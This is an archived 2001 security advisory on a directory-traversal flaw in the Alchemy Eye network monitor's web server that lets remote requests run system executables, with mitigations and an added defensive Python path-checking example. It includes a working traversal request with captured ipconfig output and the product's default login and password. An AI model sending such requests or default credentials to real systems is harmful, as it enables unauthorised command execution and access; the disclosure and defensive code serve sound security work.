4th Dec 2001 [SBWID-4889]
COMMAND
Alchemy Eye
SYSTEMS AFFECTED
Alchemy Eye and Alchemy Network Monitor v1.9x through v2.6.18
Alchemy Eye and Alchemy Network Monitor v2.6.19 through v3.0.10
PROBLEM
Rapid 7 advisories R7-0001 and R7-0002 point out two bugs in Alchemy
Eye and Alchemy Network Monitor, which are network management tools for
Microsoft Windows. The product contains a built-in HTTP server for
remote monitoring and control:
Remote Command
==============
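The web server used by Alchemy is vulnerable to the /../../ (directory
traversal) bug: a request path that starts under /cgi-bin/ and contains
../ sequences reaches an executable outside that directory, and the
server runs it and returns its output.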
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 200 OK
Date: Thu, 29 Nov 2001 18:20:00 GMT
Server: Alchemy Eye/2.0.20
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275
Windows 2000 IP Configuration
Ethernet adapter Cable:
Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
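The path check that the request above gets past, written out as an added example (not code from Alchemy or from the Rapid 7 advisories). It assumes that only files under /cgi-bin/ may be served; the function names and the sample request lines other than the advisory's are constructed here.

```python
import posixpath
from urllib.parse import unquote

# Assumption for this example: only files under /cgi-bin/ may be served.
ALLOWED_PREFIX = "/cgi-bin/"

def canonical_path(target, max_rounds=3):
    """Return the canonical request path, or None if it must be refused."""
    path = target.split("?", 1)[0]           # drop the query string
    # Decode until stable, so percent-encoded dot segments are seen as "..".
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None                           # still changing: refuse
    # Windows accepts "\" as a separator; NUL and ":" (drive letters,
    # alternate data streams) have no place in a request path here.
    path = path.replace("\\", "/")
    if not path.startswith("/") or "\x00" in path or ":" in path:
        return None
    # Collapse "." and ".." first, then test the prefix on the result.
    normalized = posixpath.normpath(path)
    if not normalized.startswith(ALLOWED_PREFIX):
        return None
    return normalized

def check_request_line(line):
    """Parse 'METHOD target HTTP/x.y' and return (allowed, canonical_path)."""
    parts = line.split()
    if len(parts) != 3:
        return (False, None)
    path = canonical_path(parts[1])
    return (path is not None, path)

if __name__ == "__main__":
    samples = [
        # Request line from the advisory's telnet session.
        "GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0",
        # Constructed sample requests.
        "GET /cgi-bin/status.exe HTTP/1.0",
        "GET /cgi-bin/./sub/../status.exe?x=1 HTTP/1.0",
    ]
    for line in samples:
        print(check_request_line(line), line)
```

The prefix test runs on the normalized path, never on the raw request string, which is why the advisory's request is refused even though it begins with /cgi-bin/.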
Authentication
==============
If nothing has been changed in the eye.ini configuration file, the
default login/password permits access to all logs. The default
login/pass is:
Login=webuser
Password=webpass
SOLUTION
According to the Rapid 7 advisories:
The current version of the product is VULNERABLE. Future versions may
also be vulnerable. If you are using any of the vulnerable versions, we
suggest the following:
(a) Disable HTTP access completely via Preferences. You must restart
the product for this to take effect.
or, (b) Require HTTP authentication via Preferences. You must restart
the product for this to take effect. This is only possible with
versions 2.6.x and later (earlier versions have no authentication
option).
(c) Create a very restricted user account and run the product under
those credentials.
Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2001 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.